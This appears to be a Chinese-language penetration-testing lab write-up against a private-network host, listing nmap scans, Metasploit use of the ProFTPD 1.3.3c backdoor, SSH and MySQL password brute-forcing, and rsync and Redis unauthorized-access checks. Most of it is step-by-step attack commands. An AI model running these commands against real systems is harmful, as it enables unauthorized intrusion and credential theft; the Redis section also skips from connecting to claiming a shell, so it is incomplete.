一.信息收集
nmap命令:
nmap -sS -p 1-65535 -sV 192.168.31.69
nmap --script=vuln 192.168.31.69



二.端口利用
21端口入侵
首先看到ftp的版本是proftpd 1.3.3c,經過了解該版本存在后門,利用msf中的模塊可以進行利用,利用過程如下:
利用命令:
msfconsole 啟動終端
search proftpd 搜索利用模塊
use exploit/unix/ftp/proftpd_133c_backdoor 使用后門模塊
show options 查看需要設置的參數
set rhosts 192.168.31.69 設置目標ip
run 攻擊





得到一個shell
22端口入侵
看到22端口就會想到ssh,想到ssh就想爆破一下試試,試試就試試
命令:
search ssh_login 搜索爆破模塊
use auxiliary/scanner/ssh/ssh_login 使用爆破模塊
show options 查看需要設置的參數
set rhosts 192.168.31.69 設置目標ip
set username root 設置用戶名為root
set pass_file /root/passwd.txt 設置密碼字典
set verbose true 顯示爆破信息
run 攻擊
ssh root@192.168.31.69 連接ssh




爆破出密碼,用戶為root密碼為123456,並成功連接上ssh
873端口入侵
873端口搭的服務是rsync,通過百度得知該服務存在未授權訪問漏洞,連接試試
命令:
rsync root@192.168.31.69:: 連接rsync
rsync root@192.168.31.69::www 連接rsync並查看www文件夾內的文件


3306端口入侵
3306端口也是可以嘗試一下爆破,命令如下:
search mysql_login 搜索mysql爆破模塊
use auxiliary/scanner/mysql/mysql_login 使用mysql爆破模塊
show options 查看需要的參數
set rhosts 192.168.31.69 設置目標ip
set username root 設置用戶名
set pass_file /root/passwd.txt 設置密碼字典
run 攻擊
search mysql_sql 搜索執行sql語句模塊
use auxiliary/admin/mysql/mysql_sql 使用該模塊
show options 查看需要的參數
set rhosts 192.168.31.69 設置目標ip
set username root 設置用戶名
set password 123456 設置密碼
set SQL show databases; 設置需要執行的sql語句
run 攻擊



爆破出密碼,用戶名為root,密碼為123456





執行show databases;成功列出所有數據庫名
6379端口入侵
該端口使用的是redis服務,可能存在未授權訪問漏洞,利用該漏洞需要安裝redis,安裝命令如下:
wget http://download.redis.io/releases/redis-2.8.12.tar.gz 下載redis
tar -xzf redis-2.8.12.tar.gz 解壓
cd redis-2.8.12/ 切換到解壓后的目錄下
make 編譯
cd /root/redis-2.8.12/src 切換到這個目錄
./redis-cli -h 192.168.31.69 執行redis-cli連接





得到一個shell
